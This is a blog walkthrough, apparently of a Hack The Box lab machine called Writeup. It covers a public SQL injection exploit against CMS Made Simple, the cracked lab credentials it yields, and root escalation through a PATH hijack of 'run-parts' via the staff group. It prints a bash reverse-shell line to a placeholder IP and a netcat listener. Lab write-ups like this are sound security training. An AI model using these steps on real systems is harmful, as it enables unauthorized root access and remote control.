Writeup

Venkatraman K
Hackthebox Writeups
5 min readOct 25, 2019

Writeup is a linux based machine.

Hints:

1.Vulnerable software can fetch the required thing for you. Software Info is given in the homepage.

2.For privilege escalation think about the groups and file may execute in spite of being on two bin directory.

Detail Walkthrough:

I started with reconnaissance of the machine through scanning ports and identifying services that are running on this machine.

As there is something with robots.txt and /writeup/. I opened these on browser and robots.txt did not have that much critical information while /writeup/ had a website. I also viewed the homepage of the application running on this machine. Home page tells us there is some kind of DoS protection for the application.

Which means that we cannot run any script or tool which generates many requests. I looked into the source of this page expecting some juicy information. As expected there was a software name disclosed .

It had CMS running on it. To get more information like baner or service version . I used the whatweb

whatweb http://10.10.10.138/writeup/

But i had no version number disclosed. I googled upon the CMS-Made-Simple and found the version as 2.2.10. There was a SQL Injection exploit which is already present with CVE-2019–9053. I got the exploit code from the Exploit DB. I ran the exploit with wordlist as rockyou.txt

Python Intial_Exp.py -u http://10.10.10.138/writeup/ — crack -w /usr/share/wordlists/rockyou.txt

This fetched the salt hash, username , email id and password

Username: jkr, Email Id: jkr@writeup.htb, password : raykayjay9

As there was SSH running, I logged in to the machine using the obtained credentials.

I got the shell and BOOM! got the user.txt. Next to start the enumeration further i used the tool LinEnum. I hosted this on the server on 8000 using

python -m SimpleHTTPServer

Files can be downloaded only on the /tmp/ directory. I moved to that directory, downloaded the LinEnum file and ran it which gave tons of info. The juciy parts were only mysql and staff group.

I thought i can enumerate on the configuration of the mysql file which may contain some creds but it was no use so i googled about the staff group on debain.

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name). Compare with group “adm”, which is more related to monitoring/security.

It simply means that staff allows the user to create or modify files on /usr/local/bin without root and if a file on /usr/local/bin and /bin have same name then both files get executed. On echoing the PATH variable it gives info that file in /usr/local/bin executed first (when there is a scenario where both bins contain files with same name)

This can be exploited only if there is a file which gets automatically executed and does not have a absolute path ( means that file must be executed only by calling its name not specifying the entire path ). A good tool to monitor the processes and files running on a linux machine is PSPY. I downloaded it and moved to the machine (using the same process which i used for LinEnum).

I ran PSPY file and found nothing interesting. I logged on to the machine with jkr in a new tab and i monitored the processes on another tab. I found that a file run-parts was getting executed by root as soon the user jkr logs in and it was executed using the relative path and it is /bin folder.

Thus we can create a file in /usr/local/bin with name as run-parts which need to contain malicious code so that as soon as we login as jkr the file run-parts gets executed and we can get a shell with root privilege.

I moved to /usr/local/bin folder and created the file run-parts.

#!/bin/bash
touch /tmp/script-ran.txt
bash -i >& /dev/tcp/{YOUR_IP}/{PORT} 0>&1

You can either do this way or you can generate SSH-keys and place the public key in the ~/.ssh/authorized_keys using a small script with the file name as run-parts and connect to the machine using the key-pair you created.

This would give a reverse shell to my machine and if this ran successfully the touch command would create a file script-ran.txt in tmp folder so i monitored the tmp folder using the command.

watch -n 1 ls -la

This command would display the files with ACL in the folder and would refresh every one second.

I started a reverse handler using the netcat

nc -lvnp {PORT}

I opened another tab and logged in as jkr user.

BOOM! i got the shell with root access…….

The root.txt flag is in /root folder

Happy Hacking!

--

--

Venkatraman K
Hackthebox Writeups

@r3dw0lfsec | Security Researcher @ Vault Infosec | CEH | Bug Hunter